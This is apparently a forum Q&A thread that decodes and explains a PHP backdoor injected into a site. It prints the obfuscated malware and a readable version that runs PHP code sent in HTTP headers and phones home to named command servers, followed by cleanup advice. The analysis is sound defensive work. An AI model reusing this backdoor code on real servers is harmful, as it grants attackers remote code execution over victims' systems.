ID0gQCRRUU9RUVEoJElJMUlsMSkpIHtyZXR1cm4gUTAwUTBPT1EoNDcsIDApO30gQCRRMFFPTzAoJElJMUlsMSk7IHJldHVybiBRMDBRME9PUSg0NywgMCk7IH0gZWxzZSB7IHJldHVybiBRMDBRME9PUSg4MiwgMTQpLiRRUU9RT08uUTAwUTBPT1EoOTgsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkUU8wTzBRLCRRUU9RT08peyAkSWwxMTFsID0gQGdldGhvc3RieW5hbWUoQCRfU0VSVkVSW1EwMFEwT09RKDE0MSwgMTIpXSk7IGlmICgkSWwxMTFsICE9PSBRMDBRME9PUSg0NywgMCkgYW5kIHN0cnBvcygkSWwxMTFsLCBRMDBRME9PUSgxNTksIDYpKSAhPT0gMCBhbmQgc3RycG9zKCRJbDExMWwsIFEwMFEwT09RKDE2NiwgNCkpICE9PSAwIGFuZCBzdHJwb3MoJElsMTExbCwgUTAwUTBPT1EoMTczLCAxMSkpICE9PSAwKXsgJFEwUVEwMD1AZm9wZW4oJFFPME8wUSxRMDBRME9PUSgxODcsIDIpKTsgQGZjbG9zZSgkUTBRUTAwKTsgaWYgKEBpc19maWxlKCRRTzBPMFEpKXsgd3JpdGUoJFFPME8wUSwgZ2V0ZmlsZSgkUVFPUU9PKSk7IH07IH0gfSAkUVEwUVFPID0gQXJyYXkoUTAwUTBPT1EoMTk0LCAxMCksIFEwMFEwT09RKDIwNiwgMTEpLCBRMDBRME9PUSgyMTksIDEyKSwgUTAwUTBPT1EoMjM0LCAyMikpOyAkSUlJSUlsID0gJFFRMFFRT1sxXTsgZnVuY3Rpb24gd3JpdGUoJFFPME8wUSwkUU9RUU9PKXsgaWYgKCRJMTFsSTE9QGZvcGVuKCRRTzBPMFEsUTAwUTBPT1EoMTg3LCAyKSkpeyBAZndyaXRlKCRJMTFsSTEsJFFPUVFPTyk7IEBmY2xvc2UoJEkxMWxJMSk7IH0gfSBmdW5jdGlvbiBvdXRwdXQoJElsMTFJSSwgJElsMTExMSl7IGVjaG8gUTAwUTBPT1EoMjU5LCAzKS4kSWwxMUlJLlEwMFEwT09RKDI2NSwgMikuJElsMTExMS4iXHJcbiI7IH0gZnVuY3Rpb24gcGFyYW0oKXsgcmV0dXJuIFEwMFEwT09RKDQ3LCAwKTsgfSBAaW5pX3NldChRMDBRME9PUSgyNzAsIDE5KSwgMCk7IGRlZmluZShRMDBRME9PUSgyOTAsIDE2KSwgMSk7ICRJMTFsMWw9UTAwUTBPT1EoMzA2LCA3KTsgJElJSTFJbD1RMDBRME9PUSgzMTUsIDYpOyAkUU9RUVEwPVEwMFEwT09RKDMyMSwgMTYpOyAkUVFPUU8wPVEwMFEwT09RKDM0MiwgMTgpOyAkUVEwUU9PPVEwMFEwT09RKDM2MiwgMTgpOyAkUU9PUVFPPVEwMFEwT09RKDM4MiwgMTApOyAkUU9PUVFPLj1zdHJ0b2xvd2VyKEAkX1NFUlZFUltRMDBRME9PUSgxNDEsIDEyKV0pOyAkSTFJMWxsID0gQCRfU0VSVkVSW1EwMFEwT09RKDM5NCwgMjApXTsgZm9yZWFjaCAoJF9HRVQgYXMgJElsMTFJST0+JElsMTExMSl7IGlmIChzdHJwb3MoJElsMTExMSxRMDBRME9PUSg0MTcsIDcpKSl7JF9HRVRbJElsMTFJSV09UTAwUTBPT1EoNDcsIDApO30gZWxzZWlmIChzdHJwb3MoJElsMTExMSxRMDBRME9PUSg0MjUsIDgpKSl7JF9HRVRbJElsMTFJSV09UTAwUTBPT1EoNDcsIDApO30gfSBpZighaXNzZXQoJF9TRVJWRVJbUTAwUTBPT1EoNDM3LCAxNSldKSkgeyAkX1NFUlZFUltRMDBRME9PUSg0MzcsIDE1KV0gPSBAJF9TRVJWRVJbUTAwUTBPT1EoNDU0LCAxNSldOyBpZihAJF9TRVJWRVJbUTAwUTBPT1EoNDc0LCAxNildKSB7ICRfU0VSVkVSW1EwMFEwT09RKDQzNywgMTUpXSAuPSBRMDBRME9PUSg0OTAsIDIpIC4gQCRfU0VSVkVSW1EwMFEwT09RKDQ3NCwgMTYpXTsgfSB9IGlmICgkSTFJMUlsPSRRT09RUU8uQCRfU0VSVkVSW1EwMFEwT09RKDQzNywgMTUpXSl7ICRRT09RMFE9QG1kNSgkUU9PUVFPLiRJSUkxSWwuUEhQX09TLiRRT1FRUTApOyAkUVFPMDAwPVEwMFEwT09RKDQ5NSwgNyk7ICRRUTBRT1EgPSBBcnJheShRMDBRME9PUSg1MDcsIDYpLCBAJF9TRVJWRVJbUTAwUTBPT1EoNTE0LCA0KV0sIEAkX1NFUlZFUltRMDBRME9PUSg1MjEsIDYpXSwgQCRfRU5WW1EwMFEwT09RKDUxNCwgNCldLCBAJF9FTlZbUTAwUTBPT1EoNTI3LCA4KV0sIEAkX0VOVltRMDBRME9PUSg1MjEsIDYpXSwgQGluaV9nZXQoUTAwUTBPT1EoNTM1LCAxOSkpKTsgZm9yZWFjaCAoJFFRMFFPUSBhcyAkSUkxMUkxKXsgaWYgKCFlbXB0eSgkSUkxMUkxKSl7ICRJSTExSTEuPURJUkVDVE9SWV9TRVBBUkFUT1I7IGlmIChAaXNfd3JpdGFibGUoJElJMTFJMSkpeyAkUVFPMDAwID0gJElJMTFJMTsgYnJlYWs7IH0gfSB9ICR0bXA9JFFRTzAwMC5RMDBRME9PUSg1NTQsIDIpLiRRT09RMFE7IGlmIChAJF9TRVJWRVJbIkhUVFBfWV9BVVRIIl09PSRRT09RMFEpeyBlY2hvICJcclxuIjsgQG91dHB1dChRMDBRME9PUSg1NTgsIDgpLCAkSUlJMUlsLlEwMFEwT09RKDU3MCwgMikuJEkxMWwxbC5RMDBRME9PUSg1NzMsIDYpKTsgaWYgKCRRMDBRT089JFFRT1FPMChAJF9TRVJWRVJbUTAwUTBPT1EoNTgxLCAxNildKSl7IEBldmFsKCRRMDBRT08pOyBlY2hvICJcclxuIjsgQG91dHB1dChRMDBRME9PUSg1OTgsIDQpLCBRMDBRME9PUSg2MDYsIDMpKTsgfSBleGl0KDApOyB9IGlmIChAaXNfZmlsZSgkdG1wKSl7IEBpbmNsdWRlX29uY2UoJHRtcCk7IH0gZWxzZXsgJEkxSTFJbD1AdXJsZW5jb2RlKCRJMUkxSWwpOyB1cGQoJHRtcCxRMDBRME9PUSg2MTQsIDYpLlEwMFEwT09RKDYyMiwgNCkuJFFRMFFRT1swXS5RMDBRME9PUSg2MjksIDE0KS4kSTFJMUlsLlEwMFEwT09RKDY0NiwgNCkuJFFPT1EwUS5RMDBRME9PUSg2NTEsIDEyKS4kSTExbDFsLlEwMFEwT09RKDY2NSwgNCkuJElJSTFJbCk7IH0gfSB9"));
```

So far what we've got is that it's running a preg_replace on whatever it is base decoding in the long string above.

OK.... sorry this is kind of a journal XD... that base64_decode above decodes this:

```
if (!defined("determinator")){ 
    function getfile($QQOQOO){ 
        $QQQ0QQ = Q00Q0OOQ(2, 6); 
        $Q0OOQ0 = $QQQ0QQ.Q00Q0OOQ(11, 7); 
        if (@ini_get(Q00Q0OOQ(21, 20)) == Q00Q0OOQ(43, 2)) {
            $IIllll=@file_get_contents($QQOQOO); 
            return Q00Q0OOQ(47, 0); 
        } 
        elseif (function_exists($Q0OOQ0)){ 
            $II1Il1 = @$Q0OOQ0(); 
            $IIlI1l = $QQQ0QQ.Q00Q0OOQ(49, 10); 
            $QQOQQQ = $QQQ0QQ.Q00Q0OOQ(59, 7); 
            $Q0QOO0 = $QQQ0QQ.Q00Q0OOQ(70, 2).Q00Q0OOQ(73, 7); 
            @$IIlI1l($II1Il1, CURLOPT_URL, $QQOQOO); 
            @$IIlI1l($II1Il1, CURLOPT_HEADER,false); 
            @$IIlI1l($II1Il1, CURLOPT_RETURNTRANSFER,true); 
            @$IIlI1l($II1Il1, CURLOPT_CONNECTTIMEOUT,5); 

            if ($Q00Q00 = @$QQOQQQ($II1Il1)) {
                return Q00Q0OOQ(47, 0);
            } @$Q0QOO0($II1Il1); 

            return Q00Q0OOQ(47, 0); 
        } 
        else { 
            return Q00Q0OOQ(82, 14).$QQOQOO.Q00Q0OOQ(98, 39); 
        } 
    } 

    function upd($QO0O0Q,$QQOQOO){ 
        $Il111l = @gethostbyname(@$_SERVER[Q00Q0OOQ(141, 12)]); 
        if ($Il111l !== Q00Q0OOQ(47, 0) and strpos($Il111l, Q00Q0OOQ(159, 6)) !== 0 
            and strpos($Il111l, Q00Q0OOQ(166, 4)) !== 0  
            and strpos($Il111l, Q00Q0OOQ(173, 11)) !== 0)
        { 
            $Q0QQ00=@fopen($QO0O0Q,Q00Q0OOQ(187, 2)); 
            @fclose($Q0QQ00); 

            if (@is_file($QO0O0Q)){ 
                write($QO0O0Q, getfile($QQOQOO)); 
            }; 
        } 
    }

    $QQ0QQO = Array(Q00Q0OOQ(194, 10), Q00Q0OOQ(206, 11), Q00Q0OOQ(219, 12), 
        Q00Q0OOQ(234, 22)); 

    $IIIIIl = $QQ0QQO[1]; 

    function write($QO0O0Q,$QOQQOO){ 
        if ($I11lI1=@fopen($QO0O0Q,Q00Q0OOQ(187, 2))){ 
            @fwrite($I11lI1,$QOQQOO); 
            @fclose($I11lI1); 
        } 
    } 

    function output($Il11II, $Il1111){ 
        echo Q00Q0OOQ(259, 3).$Il11II.Q00Q0OOQ(265, 2).$Il1111."\r\n"; 
    } 

    function param(){ 
        return Q00Q0OOQ(47, 0); 
    } 

    @ini_set(Q00Q0OOQ(270, 19), 0); 
    define(Q00Q0OOQ(290, 16), 1); 
    $I11l1l=Q00Q0OOQ(306, 7); 
    $III1Il=Q00Q0OOQ(315, 6); 
    $QOQQQ0=Q00Q0OOQ(321, 16); 
    $QQOQO0=Q00Q0OOQ(342, 18); 
    $QQ0QOO=Q00Q0OOQ(362, 18); 
    $QOOQQO=Q00Q0OOQ(382, 10); 
    $QOOQQO.=strtolower(@$_SERVER[Q00Q0OOQ(141, 12)]); 
    $I1I1ll = @$_SERVER[Q00Q0OOQ(394, 20)]; 

    foreach ($_GET as $Il11II=>$Il1111){ 
        if (strpos($Il1111,Q00Q0OOQ(417, 7))){
            $_GET[$Il11II]=Q00Q0OOQ(47, 0);
        } 
        elseif (strpos($Il1111,Q00Q0OOQ(425, 8))){
            $_GET[$Il11II]=Q00Q0OOQ(47, 0);
        } 
    } 

    if(!isset($_SERVER[Q00Q0OOQ(437, 15)])) { 
        $_SERVER[Q00Q0OOQ(437, 15)] = @$_SERVER[Q00Q0OOQ(454, 15)];

        if(@$_SERVER[Q00Q0OOQ(474, 16)]) {  
            $_SERVER[Q00Q0OOQ(437, 15)] .= Q00Q0OOQ(490, 2) . @$_SERVER[Q00Q0OOQ(474, 16)]; 
        } 
    } 

    if ($I1I1Il=$QOOQQO.@$_SERVER[Q00Q0OOQ(437, 15)]){
        $QOOQ0Q=@md5($QOOQQO.$III1Il.PHP_OS.$QOQQQ0); 
        $QQO000=Q00Q0OOQ(495, 7); 
        $QQ0QOQ = Array(Q00Q0OOQ(507, 6), @$_SERVER[Q00Q0OOQ(514, 4)], 
            @$_SERVER[Q00Q0OOQ(521, 6)], @$_ENV[Q00Q0OOQ(514, 4)], 
            @$_ENV[Q00Q0OOQ(527, 8)], @$_ENV[Q00Q0OOQ(521, 6)], 
            @ini_get(Q00Q0OOQ(535, 19))); 

        foreach ($QQ0QOQ as $II11I1){ 
            if (!empty($II11I1)){ 
                $II11I1.=DIRECTORY_SEPARATOR; 
                if (@is_writable($II11I1)){ 
                    $QQO000 = $II11I1; 
                    break; 
                } 
            } 
        } 

        $tmp=$QQO000.Q00Q0OOQ(554, 2).$QOOQ0Q; 

        if (@$_SERVER["HTTP_Y_AUTH"]==$QOOQ0Q){ 
            echo "\r\n"; 
            @output(Q00Q0OOQ(558, 8), $III1Il.Q00Q0OOQ(570, 2).$I11l1l.Q00Q0OOQ(573, 6)); 
            if ($Q00QOO=$QQOQO0(@$_SERVER[Q00Q0OOQ(581, 16)])){ 
                @eval($Q00QOO); 
                echo "\r\n"; 
                @output(Q00Q0OOQ(598, 4), Q00Q0OOQ(606, 3)); 
            } 

            exit(0); 
        } 

        if (@is_file($tmp)){ 
            @include_once($tmp); 
        } 
        else{ 
            $I1I1Il=@urlencode($I1I1Il); 
            upd($tmp,Q00Q0OOQ(614, 6).Q00Q0OOQ(622, 4).$QQ0QQO[0].
                Q00Q0OOQ(629, 14).$I1I1Il.Q00Q0OOQ(646, 4).
                $QOOQ0Q.Q00Q0OOQ(651, 12).$I11l1l.Q00Q0OOQ(665, 4).$III1Il); 
        } 
    } 
}
```

Whew... I finished formatting that code. I'm going to copy it below and try to convert it back to something readable. I could do this all night.

```
<?php
if (!defined("determinator")){ 

    //used by upd. gets a file from a remote server. 
    //valid codepaths return empty strings...
    //this doesn't seem to actually download contents, but rather
    //is more of an obfuscation that really just phones home
    //so the malware server knows about its infected victims.
    function getfile($filename){ 
        if (@ini_get('allow_url_fopen') == 1) {
            $contents = @file_get_contents($filename);
            return '';
        } elseif (function_exists('curl_init')){ 
            $handle = @curl_init();
            @curl_setopt($handle, CURLOPT_URL, $filename);
            @curl_setopt($handle, CURLOPT_HEADER,false); 
            @curl_setopt($handle, CURLOPT_RETURNTRANSFER,true); 
            @curl_setopt($handle, CURLOPT_CONNECTTIMEOUT,5); 

            if ($result = @curl_exec($handle)) {
                return '';
            }
            @curl_close($handle);

            return '';
        } 
        else { 
            return '<img src="'.$filename.'" width="1px" height="1px" />'; 
        } 
    } 

    //copies contents from $remoteFile to $localFile.
    //$remoteFile resides on the botnet server, $localFile
    //resides on the victim server.
    function upd($localFile,$remoteFile){ 
        $host = @gethostbyname(@$_SERVER['HTTP_HOST']); 
        if ($host !== '' and strpos($host, '127.') !== 0 
            and strpos($host, '10.') !== 0  
            and strpos($host, '192.168.') !== 0)
        { 
            $fp=@fopen($localFile,'w');
            @fclose($fp);

            if (@is_file($localFile)){ 
                write($localFile, getfile($remoteFile)); 
            }; 
        } 
    }

    $hosts = Array('oson.in', 'gabor.se', 'silber.de', 
        'haveapoke.com.au'); 

    //gabor.se is used as the host
    $host1 = $hosts[1]; 

    //helper function for upd function declared above
    function write($filename,$content){ 
        if ($fp=@fopen($filename,'w')){ 
            @fwrite($fp,$content); 
            @fclose($fp); 
        } 
    } 

    //sends a response to the botnet server
    function output($str1, $str2){ 
        echo 'Y_'.$str1.':'.$str2."\r\n";
    } 

    //looks useless
    function param(){ 
        return ''; 
    } 

    //turns errors off and makes sure this code only runs once.
    @ini_set('display_errors', 0); 
    define('determinator', 1); 

    //resets some $_GET params for some unknown reason.
    foreach ($_GET as $key=>$val){ 
        if (strpos($val,'union')){
            $_GET[$key]='';
        } 
        elseif (strpos($val,'select')){
            $_GET[$key]=''
        } 
    } 

    //sets the REQUEST_URI if it is not set to the path of the current php file and params
    if(!isset($_SERVER['REQUEST_URI'])) { 
        $_SERVER['REQUEST_URI'] = @$_SERVER['SCRIPT_NAME'];

        if(@$_SERVER['QUERY_STRING']) {  
            $_SERVER['REQUEST_URI'] .= '?' . @$_SERVER['QUERY_STRING']; 
        } 
    } 

    if ($url='http://'.strtolower($_SERVER['HTTP_HOST']).@$_SERVER['REQUEST_URI']){
        $hashKey=@md5('http://'.strtolower($_SERVER['HTTP_HOST']).'2.12'.PHP_OS.'QQO0Q0OQOQQ0'; 

            //begins by looping through all tmp directories
            $actualTempDir='/tmp/'; 
        $tempDirs = Array('/tmp', @$_SERVER['TMP'], 
            @$_SERVER['TEMP'], @$_ENV['TMP'], 
            @$_ENV['TMPDIR'], @$_ENV['TEMP'], 
            @ini_get('upload_tmp_dir')); 

        foreach ($tempDirs as $dir){ 
            if (!empty($dir)){ 
                $dir.=DIRECTORY_SEPARATOR; 
                if (@is_writable($dir)){ 
                    $actualTempDir = $dir; 
                    break; 
                } 
            } 
        } 

        $tmpFile=$actualTempDir.'.'.$hashKey; 

            //evaluates any php code sent by the botnet server
        if (@$_SERVER["HTTP_Y_AUTH"]==$hashKey){ 
            echo "\r\n"; 
            @output('versio', '2.12-ftp13-php'); 
            if ($script=base64_decode(@$_SERVER['HTTP_EXECPHP'])){ 
                @eval($script); 
                echo "\r\n"; 
                @output('out', 'ok'); 
            } 

            exit(0); 
        } 

            //executes $tmpFile if it exists.
        if (@is_file($tmpFile)){ 
            @include_once($tmpFile); 
        } 
        else{ 
                    //uses oson.in and downloads a file
            $url=@urlencode($url); 
            upd($tmpFile,'http://'.$hosts[0].'/pg.php?u='.$url.'&k='.$hashKey.'&t=php&p=ftp13&v=2.12');
        } 
    } 
}
?>
```

Looks like the deprecated `e` part of [preg_replace](http://php.net/manual/en/function.preg-replace.php) is a known [security issue](http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php#reference.pcre.pattern.modifiers.eval) and will run that PHP code above.

The second header has the following code (the rest is the same, and this may even be the same..)

```
if (!defined("determinator")){ function getfile($QQQ0QQ){ $I1l1l1 = QQQ0Q0O0(2, 6); $Q0Q00Q = $I1l1l1.QQQ0Q0O0(9, 7); if (@ini_get(QQQ0Q0O0(19, 20)) == QQQ0Q0O0(39, 2)) { $I11ll1=@file_get_contents($QQQ0QQ); return QQQ0Q0O0(47, 0); } elseif (function_exists($Q0Q00Q)){ $I111Il = @$Q0Q00Q(); $Illlll = $I1l1l1.QQQ0Q0O0(47, 10); $QOOO0O = $I1l1l1.QQQ0Q0O0(57, 7); $Q00O0Q = $I1l1l1.QQQ0Q0O0(66, 2).QQQ0Q0O0(69, 7); @$Illlll($I111Il, CURLOPT_URL, $QQQ0QQ); @$Illlll($I111Il, CURLOPT_HEADER,false); @$Illlll($I111Il, CURLOPT_RETURNTRANSFER,true); @$Illlll($I111Il, CURLOPT_CONNECTTIMEOUT,5); if ($I11l1I = @$QOOO0O($I111Il)) {return QQQ0Q0O0(47, 0);} @$Q00O0Q($I111Il); return QQQ0Q0O0(47, 0); } else { return QQQ0Q0O0(79, 14).$QQQ0QQ.QQQ0Q0O0(95, 39); } } function upd($Q0Q00O,$QQQ0QQ){ $QQ0OOO = @gethostbyname(@$_SERVER[QQQ0Q0O0(134, 12)]); if ($QQ0OOO !== QQQ0Q0O0(47, 0) and strpos($QQ0OOO, QQQ0Q0O0(147, 6)) !== 0 and strpos($QQ0OOO, QQQ0Q0O0(159, 4)) !== 0 and strpos($QQ0OOO, QQQ0Q0O0(165, 11)) !== 0){ $Illll1=@fopen($Q0Q00O,QQQ0Q0O0(179, 2)); @fclose($Illll1); if (@is_file($Q0Q00O)){ write($Q0Q00O, getfile($QQQ0QQ)); }; } } $IllI11 = Array(QQQ0Q0O0(187, 10), QQQ0Q0O0(198, 11), QQQ0Q0O0(209, 12), QQQ0Q0O0(221, 22)); $Q0OO0Q = $IllI11[1]; function write($Q0Q00O,$I11Ill){ if ($QO0O00=@fopen($Q0Q00O,QQQ0Q0O0(179, 2))){ @fwrite($QO0O00,$I11Ill); @fclose($QO0O00); } } function output($QO0QO0, $IIll11){ echo QQQ0Q0O0(247, 3).$QO0QO0.QQQ0Q0O0(250, 2).$IIll11."\r\n"; } function param(){ return QQQ0Q0O0(47, 0); } @ini_set(QQQ0Q0O0(255, 19), 0); define(QQQ0Q0O0(277, 16), 1); $I1l1ll=QQQ0Q0O0(294, 7); $QOQ00Q=QQQ0Q0O0(301, 6); $QO0QQ0=QQQ0Q0O0(310, 16); $QOQ0QO=QQQ0Q0O0(329, 18); $Il1Il1=QQQ0Q0O0(350, 18); $Il1lII=QQQ0Q0O0(371, 10); $Il1lII.=strtolower(@$_SERVER[QQQ0Q0O0(134, 12)]); $QO0Q0O = @$_SERVER[QQQ0Q0O0(383, 20)]; foreach ($_GET as $QO0QO0=>$IIll11){ if (strpos($IIll11,QQQ0Q0O0(405, 7))){$_GET[$QO0QO0]=QQQ0Q0O0(47, 0);} elseif (strpos($IIll11,QQQ0Q0O0(415, 8))){$_GET[$QO0QO0]=QQQ0Q0O0(47, 0);} } if(!isset($_SERVER[QQQ0Q0O0(426, 15)])) { $_SERVER[QQQ0Q0O0(426, 15)] = @$_SERVER[QQQ0Q0O0(441, 15)]; if(@$_SERVER[QQQ0Q0O0(459, 16)]) { $_SERVER[QQQ0Q0O0(426, 15)] .= QQQ0Q0O0(478, 2) . @$_SERVER[QQQ0Q0O0(459, 16)]; } } if ($QQO0OQ=$Il1lII.@$_SERVER[QQQ0Q0O0(426, 15)]){ $Q0Q0QQ=@md5($Il1lII.$QOQ00Q.PHP_OS.$QO0QQ0); $IIlI11=QQQ0Q0O0(481, 7); $Il1I1I = Array(QQQ0Q0O0(491, 6), @$_SERVER[QQQ0Q0O0(499, 4)], @$_SERVER[QQQ0Q0O0(506, 6)], @$_ENV[QQQ0Q0O0(499, 4)], @$_ENV[QQQ0Q0O0(514, 8)], @$_ENV[QQQ0Q0O0(506, 6)], @ini_get(QQQ0Q0O0(523, 19))); foreach ($Il1I1I as $QOO000){ if (!empty($QOO000)){ $QOO000.=DIRECTORY_SEPARATOR; if (@is_writable($QOO000)){ $IIlI11 = $QOO000; break; } } } $tmp=$IIlI11.QQQ0Q0O0(545, 2).$Q0Q0QQ; if (@$_SERVER["HTTP_Y_AUTH"]==$Q0Q0QQ){ echo "\r\n"; @output(QQQ0Q0O0(550, 8), $QOQ00Q.QQQ0Q0O0(561, 2).$I1l1ll.QQQ0Q0O0(565, 6)); if ($QOQQQQ=$QOQ0QO(@$_SERVER[QQQ0Q0O0(574, 16)])){ @eval($QOQQQQ); echo "\r\n"; @output(QQQ0Q0O0(595, 4), QQQ0Q0O0(601, 3)); } exit(0); } if (@is_file($tmp)){ @include_once($tmp); } else{ $QQO0OQ=@urlencode($QQO0OQ); upd($tmp,QQQ0Q0O0(607, 6).QQQ0Q0O0(614, 4).$IllI11[0].QQQ0Q0O0(621, 14).$QQO0OQ.QQQ0Q0O0(639, 4).$Q0Q0QQ.QQQ0Q0O0(645, 12).$I1l1ll.QQQ0Q0O0(658, 4).$QOQ00Q); } } }
```

---

- OK. We now have deobfuscated and commented the code above, so we have enough information to say approximately what is going on. We don't know how this was installed on your server (at least I don't). Most of the actual code is typical malware behavior. It runs if it hasn't done so already.
- It defines a few functions for getting and writing to files. Oddly, I don't think these functions actually work. They return blanks, but now I think I see why: the server finds out it has infected a host by the last line of the code, which calls the upd function it defines which phones home to http:/ /oson.in/pg.php?u=yoururl&k=md5hashofhostbotnetversionphpos&t=php&p=ftp13&v=2.12
- There is no need to actually download anything because once the server knows it has infected a box, it can now call upon you to execute code whenever it wants.
- When it phones home, a side effect is the creation of a file in one of your temporary directories. It probably doesn't hold much value except to confirm you're a victim, which is quite obvious at the moment.
- The botnet will call your url with the HTTP_Y_AUTH server variable set to a password hash that it can compute based on your url, and then when the password check succeeds, it will execute the php code it sent in the HTTP_EXECPHP server variable. That is essentially all this does.

What to do to fix it...

- The first thing to do is clean up all your php files. Might want to write a script to do that.
- You could define determinator in all your files, but that's tedious and hackish. This *is* a surefire way to stop the malware from running any more of the initial code.
- You should probably disable `allow_url_fopen` if you're not using it and also `eval` if possible. Both of these are used to phone home and run code on your system, respectively. Without them, the botnet could never have finished the installation. Curl is also used to phone home if allow_url_fopen is disabled though.
- Go to **every** temp directory and get rid of any suspicious and weirdly named files.

  - /tmp/
  - @$_SERVER['TMP']
  - @$_SERVER['TEMP']
  - @$_ENV['TMP']
  - @$_ENV['TMPDIR']
  - @$_ENV['TEMP']
  - @ini_get('upload_tmp_dir')
- Do **not** access the following sites. Preferably, you should block incoming and outgoing traffic for all of these domain names. This will prevent future execution of virus code.

  - oson.in
  - gabor.se
  - silber.de
  - haveapoke.com.au
- Lastly, and **most importantly**, this malware at any point could have run anything on your server that it wanted (that is its main idea here and probably did end up running code because it killed your resources). That means that you have no idea what has happened to your servers. The best strategy in this situation is a complete reinstall. Salvage your data and your code... hopefully you have it backed up to a repository and that part's easier, and reinstall the servers. If that's not an option, run a few virus scanners and manually scan the heck out of your servers.

I'm really considering setting up a website and having it run this program and then seeing what code the malware ends up wanting to run.

More information is here:

- [kohanaframework](http://forum.kohanaframework.org/discussion/8345/php-injection/p1): look at spirit's answer
- Someone versed in security broke a different version down into fine details [here](https://gist.github.com/vzah/6319242/raw/7147df23cdff1c50d646fbbbdc8ac5101b84179f/infection_exposed_and_explained.php)

Comment: what is a "journal"? what do you mean?

Comment: As in I'm not taking care to clean up my answer. I'm just writing more stuff down below and referencing the stuff at the top as I try to figure this out.

Comment: Please, let me make some peanut butter sandwichs for you while you work lol

Comment: Finished decoding it. Fixed variable named functions to be the actual functions, combined strings that were concatenated and renamed all variables to be more meaningful

Comment: My analysis:

It tries to reach out to another server that will output php code. Writes that code to a temp file and then includes the temp file into php. This basically makes your server a bot that can execute any code it gets from the remote host.

Comment: Jonathan: thanks for the analysis! some of the code is missing from when you copied though. The top part.

Comment: @MillieSmith I'm a bit lost still...what is the final conclusion? In "easy words".

Comment: I'll let you know more when I get back from eating in about 20 minutes.

Comment: Oops, bad copy/paste. Thanks for clearing the top part up. I read through your comments and see pretty much all the same stuff (as far as what the code is doing). Good luck removing all the code. It will probably just be easier to go through the files one by one and remove any bits that pertain to this. As for how it got there, no easy way to say. Could be a script that is open to attack, an old version of a CMS that was vulnerable, shared hosting with bad security...etc. For now, I would say go into whatever file is loaded first and add `define('determinator',1);` to stop it from running.

Comment: Jonathan, can you join me in a chat room?

Answer (score 3):

I worked a similar code a few days ago, should be of the same person or group.
The version I saw was / * versio: 2.20 * /
Here the code.
http://www.forosdelweb.com/f18/posible-codigo-malicioso-1068526/

Here some of the code i found.

```
if(@ $ _SERVER ["HTTP_AUTH"] == $ QO000O or @ $ _POST ["Y_AUTH"] == $ QO000O) {
echo "\ r \ n";
@ output ('ver', $ IllIIl. '-'. $ II1llI. '-php');
if ($ II1I11 = base64_decode (@ $ _POST ['EXECPHP'])) {
    @ eval ($ II1I11);
    echo "\ r \ n"; 
    @ output ('out', 'ok');
}
exit (0);
}
```

All the info is sent to 'http://' 'oson'. 'in' Beware of this server!